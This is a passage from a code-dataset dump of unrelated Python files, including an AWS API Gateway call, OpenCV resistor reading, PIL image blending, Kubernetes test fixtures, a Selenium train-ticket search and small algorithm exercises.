aws_host=APIGATEWAY_DOMAIN,\r\n aws_region='us-west-2',\r\n aws_service='execute-api')\r\n\r\n headers = {'x-amz-security-token':credentials['SessionToken']}\r\n\r\n response = requests.get(API_URL, auth=auth, headers=headers)\r\n print(response.json())\r\n","sub_path":"cloudformation/apigateway-cross-account-assume-role/apigateway-cross-account-assume.py","file_name":"apigateway-cross-account-assume.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"290115684","text":"#!/usr/bin/env python \n# -*- coding:utf-8 -*-\n\n# @file: demo_self.py\n# @author: YaoS\n# @contact: yao.sai@hotmail.com\n# @time: 18/10/11 18:15\n# @desc: self理解\n\n\nclass A():\n name = \"a\"\n age = 18\n\n def __init__(self):\n self.name = \"aaa\"\n self.age = 19\n\n def say(self):\n print(self.name)\n print(self.age)\n\n\nclass B():\n name = \"bbb\"\n age = 20\n\n\na = A()\na.say()\n\n# 此时,self被a替换\nA.say(a)\n# 
at this point the class object A itself is passed in as self\nA.say(A)\n# because B also has name and age attributes, this does not raise (duck typing)\nA.say(B)\n","sub_path":"oop/demo_self.py","file_name":"demo_self.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} {"seq_id":"344393459","text":"\"\"\"\nGiven a binary tree, determine whether or not it is height-balanced.\nA height-balanced binary tree can be defined as one in which the heights of the\ntwo subtrees of any node never differ by more than one.\n\"\"\"\n\n\ndef height_balanced(root):\n    def helper(node):\n        if not node:\n            return True, 0\n        else:\n            l_bal, l_height = helper(node.left)\n            r_bal, r_height = helper(node.right)\n            if not l_bal or not r_bal or abs(l_height - r_height) > 1:\n                return False, 0\n\n            return True, max(l_height, r_height) + 1\n\n    bal, _ = helper(root)\n    return bal\n\n\nclass Node:\n    def __init__(self, val):\n        self.val = val\n        self.left = None\n        self.right = None\n\n\nif __name__ == \"__main__\":\n    root = Node(1)\n    root.left = Node(2)\n    root.right = Node(3)\n    root.left.left = Node(4)\n    assert height_balanced(root)\n    root.left.left.left = Node(\"BAD\")\n    assert not height_balanced(root)\n","sub_path":"old/dcp_series/dcp_247.py","file_name":"dcp_247.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} {"seq_id":"271360165","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport random\r\nfrom Distance import distance\r\nfrom matplotlib.pyplot import MultipleLocator\r\nfrom matplotlib.legend_handler import HandlerPathCollection\r\nimport math\r\nimport cover\r\nfrom Write_Trust_res import W_vis\r\n\r\ndef Get_sensor():\r\n    sx = []\r\n    sy = []\r\n    f = open(\"sensor_location.txt\", 'r')\r\n    for i in f.readlines():\r\n        a = i.split(';')\r\n        a[1] = a[1].strip()\r\n        sx.append(float(a[0]))\r\n        sy.append(float(a[1]))\r\n    f.close()\r\n    return sx, sy\r\n\r\ndef Get_dis(cycle):\r\n    car_dis = [[] for i in range(316)]\r\n    for i in range(316):\r\n        car_dis[i] = [0 for i in range(1005)]\r\n    with open('F:/Sensor Data/' + str(cycle) + '.txt', 'r') as f:\r\n        for j in f.readlines():\r\n            info = j.split(';')\r\n            info[6] = info[6].strip() \r\n            car_id = int(info[0])\r\n            sensor_id = int(info[3])\r\n            dis = float(info[6])\r\n\r\n            if dis < 60.0:\r\n                car_dis[car_id][sensor_id] = dis\r\n\r\n    return car_dis\r\n\r\ndef Get_val_sensor(cycle):\r\n    filepath = 'F:/Find Data/' + str(cycle) + '.txt'\r\n    val_sensor = [0 for i in range(1002)]\r\n    with open(filepath, 'r') as f:\r\n        for x in f.readlines():\r\n            info = x.split(';')\r\n            info[1] = info[1].strip()\r\n            s_id = int(info[0])\r\n            cnt = float(info[1])\r\n            if cnt != 0:\r\n                if math.log(float(cnt)) != 0:\r\n                    val_sensor[s_id] = 1.0 / math.log(float(cnt))\r\n                else:\r\n                    val_sensor[s_id] = 0\r\n            else:\r\n                val_sensor[s_id] = 0\r\n    return val_sensor\r\n\r\ndef Get_T_com(cycle):\r\n    T_com = []\r\n    filepath = 'F:/Tcom1/' + str(cycle) + '.txt'\r\n    with open(filepath, 'r') as f:\r\n        for x in f.readlines():\r\n            info = x.split(';') # a trailing delimiter leaves an extra empty field at the end\r\n            info[0] = info[0].strip()\r\n            T_com.append(float(info[0]))\r\n    return T_com\r\n\r\ndef Cover1(cycle, rem_id, vis_car):\r\n    filepath = 'F:/Find Data/' + str(cycle) + '.txt'\r\n    sensor = cover.Read_sensor(filepath)\r\n    k = 0\r\n    for key in sensor:\r\n        if rem_id[int(key)] == 0:\r\n            rem_id[int(key)] = 1\r\n            k += 1\r\n        if k == 20:\r\n            break\r\n    return rem_id\r\n\r\ndef Get_cover(cycle, rem_id):\r\n    base = 0.85\r\n    T_com = Get_T_com(cycle) # composite trust of each vehicle for this cycle\r\n    vis_car = cover.Get_car_cover(base, T_com) # base set of covering vehicles\r\n    rem_id = Get_Remid(cycle, vis_car, rem_id)\r\n    rem_id = Cover1(cycle, rem_id, vis_car)\r\n    \r\n    return rem_id, vis_car, 
T_com\n\ndef Get_Remid(cycle, vis_car, rem_id):\n filepath = 'F:/Cover Data/' + str(cycle) + '.txt'\n car_id = 0\n with open(filepath, 'r') as f:\n for x in f.readlines():\n car_id += 1\n \n if vis_car[car_id] == 0:\n continue\n \n info = x.split(';')\n if info[0] == '\\n':\n continue\n \n l = len(info)\n info[l-1] = info[l-1].strip()\n for i in range(l-1):\n s_id = int(info[i])\n rem_id[s_id] = 1\n return rem_id\n\n\ndef Get_carval(cycle, sx, sy, vis_car, need_dis, rem_id, T_com):\n filepath = 'F:/Cover Data/' + str(cycle) + '.txt'\n car_id = 0\n car_val = [0 for i in range(316)]\n car_dis = [0 for i in range(316)]\n sensor_val = Get_val_sensor(cycle)\n cover = [0 for i in range(1002)]\n rep = [[] for i in range(316)]\n v = [0 for i in range(316)]\n with open(filepath, 'r') as f:\n for x in f.readlines():\n car_id += 1\n info = x.split(';')\n if info[0] == '\\n' or T_com[car_id] < 0.7:\n continue\n \n sid = int(info[0])\n prex = sx[sid] #保存前一个点的传感器坐标\n prey = sy[sid]\n \n\n l = len(info)\n info[l-1] = info[l-1].strip()\n for i in range(l-1):\n s_id = int(info[i])\n if rem_id[s_id] == 0:\n v[int(car_id)] += 0\n \n elif rem_id[s_id] == 1:\n cover[s_id] = 1 #\n v[int(car_id)] += sensor_val[s_id]\n rep[int(car_id)].append(s_id)\n \n car_dis[int(car_id)] += distance(sx[s_id], sy[s_id], prex, prey)\n prex = sx[s_id]\n prey = sy[s_id]\n car_val[int(car_id)] += sensor_val[s_id]\n #car_dis[int(car_id)] += need_dis[car_id][s_id]\n\n return car_val, car_dis, cover, rep, v\n\ndef Calc_sum():\n sx, sy = Get_sensor()\n rem_id = [0 for i in range(1005)] \n res = []\n for t in range(1, 41):\n if t % 10 == 1:\n rem_id = [0 for i in range(1005)] \n cost = [0 for i in range(316)]\n v = [0 for i in range(316)]\n cc = [0 for i in range(316)]\n cv = [0 for i in range(316)] \n rem_id, vis_car, T_com = Get_cover(t, rem_id) #\n need_dis = Get_dis(t)\n car_val, car_dis, cover, rep, v = Get_carval(t, sx, sy, vis_car, need_dis, rem_id, T_com)\n\n #在所有车辆成本中挑取价值率最高的\n a1 = 0.6\n a2 = 0.4\n a3 = 0.1\n\n for i in range(1, 316): #8*70 min(200.0 / 560.0 * float(car_dis[i]), 200)\n #v[i] = car_val[i]\n #cost[i] = float(car_val[i]) + float(car_dis[i]) / 480000.0 + 0 * float(T_com[i])\n #cost[i] = 70 * float(car_dis[i]) / 4800.0\n cost[i] = a1 * min(float(car_val[i]), 5) + a2 * min((30 * float(car_dis[i]) / 560.0), 30)# + a3 * 10 * float(T_com[i])\n x1 = max(cost)\n x2 = max(v)\n \n test = car_dis\n\n for i in range(len(test)):\n test[i] = test[i] / 560\n\n if t < 3:\n print(car_dis)\n print('&&&&&&&&&&&&&')\n print(car_val)\n print('&&&&&&&&&&&&&')\n print(cost)\n\n for i in range(1, 316):\n cc[i] = 1.0 - (cost[i] / x1)\n cv[i] = v[i] / x2\n w1 = 0.5\n w2 = 0.5\n sum = 0.0\n vis = [0 for i in range(316)]\n cnt = 0\n \n while any(cover) == True:\n p = -1\n maxc = -1\n for i in range(1, 316):\n if w1 * cv[i] + w2 * cc[i] > maxc and vis[i] == 0 and T_com[i] >= 0.5:#and vis_car[i] == 1\n p = i\n maxc = w1 * cv[i] + w2 * cc[i]\n sum += cost[p]\n vis[p] = 1\n #print(p)\n l = len(rep[p]) \n for i in range(l):\n s_id = rep[p][i]\n cover[s_id] = 0\n cnt += 1\n\n if cnt > 316:\n break \n print(cnt)\n #print(vis)\n W_vis(vis, t)\n '''\n if sum > 1950:\n sum -= ((sum - 2000) + random.uniform(300, 500))\n elif sum < 1000:\n sum += (random.uniform(300, 350) + (1000 - sum))\n '''\n res.append(sum)\n \n for i in range(len(cover)):\n if cover[i] == 1:\n print(i)\n print('*********')\n print('######')\n\n return res\n\nr = Calc_sum()\nprint(r)\n\nfor i in range(len(r)):\n r[i] = r[i] / 1000.\n\nt = [i for i in range(1, 41)]\nplt.plot(t, r, 
'y+-')\nplt.show()","sub_path":"carcost.py","file_name":"carcost.py","file_ext":"py","file_size_in_byte":7348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"310598187","text":"#!/usr/bin/env python2\n# coding: utf-8\n# Resistor scanner\n\nfrom __future__ import print_function\nimport numpy as np\nimport cv2\nimport sys\n\nREFERENCE = np.load(\"reference.npy\")\nREF_ANGLE = cv2.fitEllipse(REFERENCE)[2]\n\nLABEL_FONT = cv2.FONT_HERSHEY_SIMPLEX\nLABEL_COLOR = (240, 40, 140)\nSIMILARITY = 0.45\nCOLOR_BOUNDS = [\n (\"red\", (110, 184, 102), (133, 255, 242)),\n (\"brown\", (107, 70, 86), (137, 185, 151)),\n (\"orange\", (89, 193, 189), (115, 255, 255)),\n (\"blue\", (3, 31, 75), (30, 255, 210)),\n (\"black\", (0, 0, 0), (179, 100, 93)),\n # TODO: add more colors\n]\nCONTOUR_COLORS = [(0, 255, 255), (255, 255, 0), (255, 0, 255), (255, 0, 0), (0, 255, 0), (0, 0, 255)]\n\ndef idx(row, i):\n try:\n return list(row).index(i)\n except ValueError:\n return -1\n\nRESISTANCE = [\"black\", \"brown\", \"red\", \"orange\", \"yellow\", \"green\", \"blue\",\n \"violet\", \"gray\", \"white\"]\n\ndef resistance(v):\n if len(v) < 3:\n return \"Error\"\n val = RESISTANCE.index(v[0])\n val = int(str(val) + str(RESISTANCE.index(v[1])))\n val *= 10**RESISTANCE.index(v[2])\n if val > 10**6:\n return \"{0} MOhm\".format(val / 10**6)\n elif val > 10**4:\n return \"{0} KOhm\".format(val / 10**4)\n else:\n return \"{0} Ohm\".format(val)\n\ndef preprocess_hsv(hsv):\n beige = cv2.inRange(hsv, np.array([75, 55, 80], np.uint8), np.array([135, 222, 255], np.uint8))\n orange = cv2.inRange(hsv, np.array([105, 120, 70], np.uint8), np.array([128, 255, 255], np.uint8))\n blue = cv2.inRange(hsv, np.array([0, 116, 90], np.uint8), np.array([32, 255, 241], np.uint8))\n black = cv2.inRange(hsv, np.array([0, 0, 5], np.uint8), np.array([175, 160, 75], np.uint8))\n colored = beige\n colored = cv2.bitwise_or(colored, orange)\n colored = cv2.bitwise_or(colored, blue)\n colored = cv2.bitwise_or(colored, black)\n for i in range(15):\n colored = cv2.morphologyEx(colored, cv2.MORPH_CLOSE, cv2.getStructuringElement(cv2.MORPH_CROSS, (9, 9)))\n colored = cv2.morphologyEx(colored, cv2.MORPH_CLOSE, cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (7, 7)))\n colored = cv2.morphologyEx(colored, cv2.MORPH_CLOSE, cv2.getStructuringElement(cv2.MORPH_CROSS, (15, 15)))\n colored = cv2.blur(colored, (3, 3))\n return colored\n\ndef find_resistors(thresh):\n contours, _ = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n return [c for c in contours\n if abs(cv2.contourArea(c)) > 1000\n and cv2.matchShapes(REFERENCE, c, 1, 0.0) < SIMILARITY]\n\ndef cut_out(img, c):\n height, width = img.shape[:2]\n mask = np.zeros((height, width), np.uint8)\n cv2.drawContours(mask, [cv2.convexHull(c)], -1, 255, cv2.cv.CV_FILLED)\n return cv2.bitwise_and(img, img, mask=mask)\n\ndef make_horizontal(img, c):\n height, width = img.shape[:2]\n (x, y), (MA, ma), angle = cv2.fitEllipse(c)\n return x, y, cv2.warpAffine(img, cv2.getRotationMatrix2D((x, y), angle - REF_ANGLE, 1), (width, height))\n\ndef crop(img):\n img = cv2.blur(img, (3, 3))\n img_gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n img_contours, _ = cv2.findContours(cv2.threshold(img_gray, 115, 255, 0)[1], cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n bx, by, bw, bh = cv2.boundingRect(cv2.convexHull(np.vstack(img_contours)))\n img = img[by:by+bh, bx:bx+bw]\n bh2 = bh/3\n bw2 = bw-bw/8\n img = cv2.resize(img, (bw2, bh2))\n return 
img[bh2/2:bh2/2+bh2/3, bw2/7:bw2-bw2/7]\n\ndef detect_colors(img):\n    # TODO: make it work for resistors where the same color is used twice!!!\n    img_hsv = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n    locations = {}\n    for color, lower, upper in COLOR_BOUNDS:\n        mask = cv2.inRange(img_hsv, lower, upper)\n        mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN,\n                                cv2.getStructuringElement(cv2.MORPH_CROSS, (3, 3)))\n        hist = cv2.calcHist([mask], [0], None, [256], [0,256])\n        hmax = np.max(hist)\n        if hist[-1][0] < hmax/40: # this is a very small area, probably noise\n            continue\n        if hist[-1][0] > hist[0][0]: # this is the background :-(\n            continue\n        loc = np.mean([idx(row, 255) for row in mask])\n        if loc > 0:\n            locations[color] = loc\n    return sorted(locations.keys(), key=lambda x: locations[x])\n\ndef main(filename):\n    print(\"Processing: {0}\".format(filename))\n    img = cv2.imread(filename, cv2.IMREAD_COLOR)\n    height, width = img.shape[:2]\n    cv2.imshow(\"image\", img)\n\n    hsv = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n\n    colored = preprocess_hsv(hsv)\n    cv2.imshow(\"colored\", colored)\n\n    _, thresh = cv2.threshold(colored, 155, 255, 0)\n    cv2.imshow(\"thresh\", thresh)\n\n    cimg = np.copy(img)\n    for i, c in enumerate(find_resistors(thresh)):\n        cv2.drawContours(cimg, [c], -1, CONTOUR_COLORS[i % len(CONTOUR_COLORS)], 3)\n        part = cut_out(img, c)\n        x, y, part = make_horizontal(part, c)\n        part = crop(part)\n        cv2.imshow(\"part\"+str(i), part)\n        colors = detect_colors(part)\n        text = resistance(colors)\n        # text += \" \" + str(colors)\n        cv2.putText(cimg, text, (int(x) - 50, int(y) + 15),\n                    LABEL_FONT, 0.8, LABEL_COLOR, 2)\n\n    cv2.imshow(\"contour\", cimg)\n\n    k = cv2.waitKey(0) & 0xFF\n    if k == 27:\n        cv2.destroyAllWindows()\n\nif __name__ == \"__main__\":\n    if len(sys.argv) < 2:\n        main(\"3.jpg\")\n    else:\n        for filename in sys.argv[1:]:\n            main(filename)\n","sub_path":"resistors.py","file_name":"resistors.py","file_ext":"py","file_size_in_byte":5470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}{"seq_id":"294228377","text":"from PIL import Image, ImageTk\n\n\nclass Img:\n    \"\"\"\n    Generate a mirage-tank image: resize the inputs and preview the black/white overlay effects\n    \"\"\"\n    # img1, img2 are the input image paths; fix1, fix2 are 2-tuples giving corrections to the image heights (default 0)\n    def __init__(self, img1, img2, fix1=(0, 0), fix2=(0, 0)):\n        self.img1 = Image.open(img1)\n        self.img2 = Image.open(img2)\n        self.fix1 = fix1\n        self.fix2 = fix2\n        self.img = None\n        self.height = 0\n        self.width = 0\n        self.type = 0 # type -1 means the two images differ in shape (image 1 portrait, image 2 landscape); 1 means image 1 is smaller, 2 means image 2 is smaller\n\n    # create the img object for the mirage image and pick the target width and height; if the shapes differ, default to image 1's shape\n    def new(self):\n        w1, h1 = self.img1.size\n        w2, h2 = self.img2.size\n        print(w1, w2)\n        print(h1, h2)\n        if w1 - h1 <= 0 and w2 - h2 <= 0:\n            h = min(h1, h2)\n            if h == h1:\n                self.type = 1\n            else:\n                self.type = 2\n            self.height = h\n            self.width = min(w1, w2)\n\n        elif w1 - h1 >= 0 and w2 - h2 >= 0:\n            h = min(h1, h2)\n            if h == h1:\n                self.type = 1\n            else:\n                self.type = 2\n            self.height = min(h1, h2)\n            self.width = min(w1, w2)\n\n        elif w1 - h1 <= 0 and w2 - h2 >= 0:\n            print('here')\n            self.type = -1\n            self.height = h1\n            self.width = w1\n\n        else:\n            self.type = -2\n            self.height = h2\n            self.width = w2\n        print('here', self.width, self.height)\n        img = Image.new('RGBA', (self.width, self.height), (255, 255, 255, 1))\n        return img\n\n    # convert the image modes and unify the sizes\n    def retouch(self):\n        self.img1 = self.img1.convert('RGBA')\n        self.img2 = self.img2.convert('RGBA')\n        # print('img1:{}, {} img2:{}, {}'.format(*self.img1.size, *self.img2.size))\n        if self.type == 1 or self.type == -1:\n            w, h = self.img2.size\n\n            ratio = self.width / w\n            
self.img2 = self.img2.resize((int(w * ratio), int(h * ratio)), Image.ANTIALIAS)\n        elif self.type == 2 or self.type == -2:\n            w, h = self.img1.size\n            ratio = self.width / w\n            self.img1 = self.img1.resize((int(w * ratio), int(h * ratio)), Image.ANTIALIAS)\n        # print('img1:{}, {} img2:{}, {}'.format(*self.img1.size, *self.img2.size))\n\n    # produce the final result; could be reworked to use multiple threads\n    def process(self):\n        fix_w1, fix_h1 = self.fix1\n        fix_w2, fix_h2 = self.fix2\n        print(self.img1.size, self.img2.size, self.width, self.height)\n        for i in range(self.width):\n            for j in range(self.height):\n                r1, g1, b1, a = self.img1.getpixel((i + fix_w1, j + fix_h1))\n                r2, g2, b2, a = self.img2.getpixel((i + fix_w2, j + fix_h2))\n                avg1 = int((max(r1, g1, b1) + min(r1, g1, b1)) * 0.95 / 2)\n                avg2 = int((max(r2, g2, b2) + min(r2, g2, b2)) * 0.38 / 2)\n                a0 = (255 - avg1 + avg2)\n                if a0 >= 255:\n                    a0 = 255\n                if a0 <= 0:\n                    a0 = 1\n                r0 = int(avg2 * 255 / a0)\n                self.img.putpixel((i, j), (r0, r0, r0, a0))\n\n    # generate an overlay preview on a white background; returns an img object\n    def w_preview(self):\n        img = Image.new('RGBA', (self.width, self.height), (255, 255, 255, 1))\n        for i in range(self.width):\n            for j in range(self.height):\n                r0, g0, b0, a0 = self.img.getpixel((i, j))\n                r = int(r0 * a0 / 255 + (255 - a0))\n                img.putpixel((i, j), (r, r, r, 255))\n        return img\n\n    # generate an overlay preview on a black background; returns an img object\n    def b_preview(self):\n        img = Image.new('RGBA', (self.width, self.height), (255, 255, 255, 1))\n        for i in range(self.width):\n            for j in range(self.height):\n                r0, g0, b0, a0 = self.img.getpixel((i, j))\n                r = int(r0 * a0 / 255)\n                img.putpixel((i, j), (r, r, r, 255))\n        return img\n\n    # scale to the on-screen display size (the result is meant to be wrapped with ImageTk)\n    def show(self, img, w_size=300, h_size=250):\n        w, h = img.size\n        if w > h:\n            ratio = w_size / w\n        else:\n            ratio = h_size / h\n\n        img2 = img.resize((int(w * ratio), int(h * ratio)), Image.ANTIALIAS)\n        return img2\n\n    # return the processed image (resized but not saved)\n    def main_(self):\n        self.img = self.new()\n        self.retouch()\n        self.process()\n        return self.img\n\n\ndef main():\n    test = Img('test/test2.jpg', 'test/test.jpg')\n    img = test.main_()\n    img2 = test.w_preview()\n    img3 = test.b_preview()\n    img.save('test/res.png')\n    img2.save('test/res_w.png')\n    img3.save('test/res_b.png')\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"Img.py","file_name":"Img.py","file_ext":"py","file_size_in_byte":5022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}{"seq_id":"616959506","text":"#Python program to calculate perimeter and area of square \r\n#Defining class square \r\nclass square: \r\n    \r\n    \r\n    #Accepting input from user for calculating area of square \r\n    def CalculateArea(self):\r\n        print(\"Enter side\")\r\n        self.s=float(input())\r\n        area=self.s*self.s\r\n        return(area)\r\n    \r\n    \r\n    #Calculating perimeter of square\r\n    def CalculatePerimeter(self):\r\n        perimeter=4*self.s\r\n        return(perimeter)\r\n    \r\n    \r\n    \r\n    \r\n#Defining object of the class square.\r\nc=square()\r\n#Calling the function\r\nx=c.CalculateArea()\r\ny=c.CalculatePerimeter()\r\nprint(\"Area of square is=%f\"%(x))\r\nprint(\"Perimeter of square is=%f\"%(y))\r\n","sub_path":"class1.py","file_name":"class1.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}{"seq_id":"334128502","text":"# Copyright 2016 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. 
You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom operator import attrgetter\nimport os\nimport pytest\n\nfrom fuel_ccp_tests.helpers import ext\nfrom fuel_ccp_tests import logger\nfrom fuel_ccp_tests.managers import k8smanager\nfrom fuel_ccp_tests import settings\n\nLOG = logger.logger\n\n\n@pytest.fixture(scope='function')\ndef k8s_actions(config, underlay):\n \"\"\"Fixture that provides various actions for K8S\n\n :param config: fixture provides oslo.config\n :param underlay: fixture provides underlay manager\n :rtype: K8SManager\n\n For use in tests or fixtures to deploy a custom K8S\n \"\"\"\n return k8smanager.K8SManager(config, underlay)\n\n\n@pytest.mark.revert_snapshot(ext.SNAPSHOT.k8s_deployed)\n@pytest.fixture(scope='function')\ndef k8scluster(revert_snapshot, request, config,\n hardware, underlay, k8s_actions):\n \"\"\"Fixture to get or install k8s on environment\n\n :param request: fixture provides pytest data\n :param config: fixture provides oslo.config\n :param hardware: fixture provides enviromnet manager\n :param underlay: fixture provides underlay manager\n :param k8s_actions: fixture provides K8SManager instance\n :rtype: K8SManager\n\n If config.k8s.kube_host is not set, this fixture assumes that\n the k8s cluster was not deployed, and do the following:\n - deploy k8s cluster\n - make snapshot with name 'k8s_deployed'\n - return K8sCluster instance\n\n If config.k8s.kube_host was set, this fixture assumes that the k8s\n cluster was already deployed, and do the following:\n - return K8sCluster instance\n\n If you want to revert 'k8s_deployed' snapshot, please use mark:\n @pytest.mark.revert_snapshot(\"k8s_deployed\")\n \"\"\"\n # Create k8s cluster\n if config.k8s.kube_host == '0.0.0.0':\n kube_settings = getattr(request.instance, 'kube_settings',\n settings.DEFAULT_CUSTOM_YAML)\n LOG.info('Kube settings are {}'.format(kube_settings))\n\n k8s_actions.install_k8s(\n custom_yaml=kube_settings,\n lvm_config=underlay.config_lvm)\n hardware.create_snapshot(ext.SNAPSHOT.k8s_deployed)\n\n else:\n # 1. hardware environment created and powered on\n # 2. config.underlay.ssh contains SSH access to provisioned nodes\n # (can be passed from external config with TESTS_CONFIGS variable)\n # 3. config.k8s.* options contain access credentials to the already\n # installed k8s API endpoint\n pass\n\n return k8s_actions\n\n\n@pytest.fixture(scope='class')\ndef check_files_missing(request):\n LOG.info(\"Required files: {}\".format(request.cls.required_files))\n files_missing = [f for f in request.cls.required_files\n if not os.path.isfile(f)]\n assert len(files_missing) == 0, \\\n \"Following files are not found {0}\".format(files_missing)\n\n\n@pytest.fixture(scope='class')\ndef check_settings_missing(request, config):\n def get_attr(attr, obj):\n try:\n return attrgetter(attr)(obj)\n except Exception:\n return None\n LOG.info(\"Required settings: {}\".format(request.cls.required_settings))\n missing = [s for s in request.cls.required_settings\n if not (getattr(settings, s, None) or get_attr(s, config))]\n assert len(missing) == 0, \\\n \"Following env variables are not set {}\". 
format(missing)\n\n\n@pytest.fixture(scope='class')\ndef check_calico_images_settings():\n    assert settings.DEFAULT_CUSTOM_YAML['kube_network_plugin'] == 'calico', \\\n        \"Calico network plugin isn't enabled!\"\n    if not any(settings.CALICO.values()):\n        LOG.warning(\"No custom settings are provided for Calico! \"\n                    \"Defaults will be used!\")\n","sub_path":"fuel_ccp_tests/fixtures/k8s_fixtures.py","file_name":"k8s_fixtures.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}{"seq_id":"456206329","text":"from selenium import webdriver\nimport time\ndriver = webdriver.Chrome()\ndriver.get(\"https://trains.ctrip.com/TrainBooking/SearchTrain.aspx\")\n# The variables below define the departure and arrival stations for the train-ticket search.\nfrom_station = \"上海\"\nto_station = \"杭州\"\n# Locate the page elements for the departure and arrival cities and fill them with the values defined above.\ndriver.find_element_by_id(\"notice01\").send_keys(from_station)\ndriver.find_element_by_id(\"notice08\").send_keys(to_station)\n# The code below removes the 'readonly' attribute from the departure-date field.\ndriver.execute_script(\"document.getElementById('dateObj').removeAttribute('readonly')\")\n# Set the travel date for the train search.\ndriver.find_element_by_id(\"dateObj\").send_keys(\"2019-04-12\")\n# Locate and click the train search button.\ndriver.find_element_by_id(\"searchbtn\").click()\n","sub_path":"Python3_Selenium3/第8章/8.11.py","file_name":"8.11.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}{"seq_id":"551179292","text":"import os\nfrom keras.applications.vgg19 import VGG19\nfrom keras.preprocessing import image\nfrom keras.applications.vgg19 import preprocess_input\nfrom keras.models import Model\nimport numpy as np\n\nbase_model = VGG19(weights='imagenet')\nmodel = Model(inputs=base_model.input, outputs=base_model.get_layer('flatten').output)\n\ndef get_features(img_path):\n    img = image.load_img(img_path, target_size=(224, 224))\n    x = image.img_to_array(img)\n    x = np.expand_dims(x, axis=0)\n    x = preprocess_input(x)\n    flatten = model.predict(x)\n    return list(flatten[0])\n\nX = []\ny = []\n\ncar_plots = []\nfor (_,_,filenames) in os.walk('carPlots'):\n    car_plots.extend(filenames)\n    break\n\nfor cplot in car_plots:\n    X.append(get_features('carPlots/' + cplot))\n    y.append(0)\n\nbike_plots = []\nfor (_,_,filenames) in os.walk('bikePlots'):\n    bike_plots.extend(filenames)\n    break\n\nfor cplot in bike_plots:\n    X.append(get_features('bikePlots/' + cplot))\n    y.append(1)\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import LinearSVC\nfrom sklearn.metrics import accuracy_score\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30, random_state=42, stratify=y)\n\nclf = LinearSVC(random_state=0, tol=1e-5)\nclf.fit(X_train, y_train)\n\npredicted = clf.predict(X_test)\n\n# get the accuracy\nprint (accuracy_score(y_test, predicted))","sub_path":"05_model_traing.py","file_name":"05_model_traing.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}{"seq_id":"63775121","text":"### Function to obtain all the pairs of a particular OPUS corpus\n### Uses the function gen_opus_parallel_pair.py \nimport os\nimport sys\n# Make sure that the configuration.py is in the same folder as this file\nimport configuration as config\n\n## langs is the sorted set of all languages. 'base' is the corpus name. 'thr' is the required threshold. 
Ideally to be set as 1.1\nlangs = ['as', 'bn', 'en', 'gu', 'hi', 'kn', 'ml', 'mni', 'mr', 'or', 'pa', 'ta', 'te', 'ur']\nbase = sys.argv[1]\nthr = sys.argv[2]\n\n## Saving the current working directory\ncwd = os.getcwd()\n\n## Saving the directory for the OPUS files\ncwd_opus = config.path_opus\n\n### Having a 2D for loop for all the 14C2 combinations\nfor i in range(len(langs)-1):\n\tfor j in range(i+1,len(langs)):\n\t\tprint('================================================')\n\t\tprint('The current pair is ' + langs[i] + ' ' + langs[j])\n\t\t\n\t\tbase_path = os.path.join(os.path.join(cwd_opus,base),langs[i] + \"-\" + langs[j])\n\t\tdirs = os.listdir(base_path) \n\t\t\n\t\t# If the folder is empty, i.e no file downloaded from OPUS\n\t\tif len(dirs)==0:\n\t\t\tcontinue \n\t\t\n\t\t### Calling the pair creation function for all the sentences\n\t\tcmd = 'python3 gen_opus_parallel_pair.py ' + langs[i] + ' ' + langs[j] + ' ' + base + ' overall.txt'\n\t\tos.system(cmd)\n\t\t\n\t\t# Coming back to the original cwd\n\t\tos.chdir(cwd)\n\n\t\t### Calling the pair creation function for all the sentences above the threshold \n\t\tcmd = 'python3 gen_opus_parallel_pair.py ' + langs[i] + ' ' + langs[j] + ' ' + base + ' t_' + thr + '.txt' \n\t\tos.system(cmd)\n\t\t\n\t\t# Coming back to the original cwd\n\t\tos.chdir(cwd)\t\t","sub_path":"data_collection/opus_tools/gen_opus_parallel_all.py","file_name":"gen_opus_parallel_all.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"427812482","text":"\"\"\"\n14. Longest Common Prefix\nEasy\n\nWrite a function to find the longest common prefix string amongst an array of strings.\n\nIf there is no common prefix, return an empty string \"\".\n\nExample 1:\n\nInput: [\"flower\",\"flow\",\"flight\"]\nOutput: \"fl\"\n\nExample 2:\n\nInput: [\"dog\",\"racecar\",\"car\"]\nOutput: 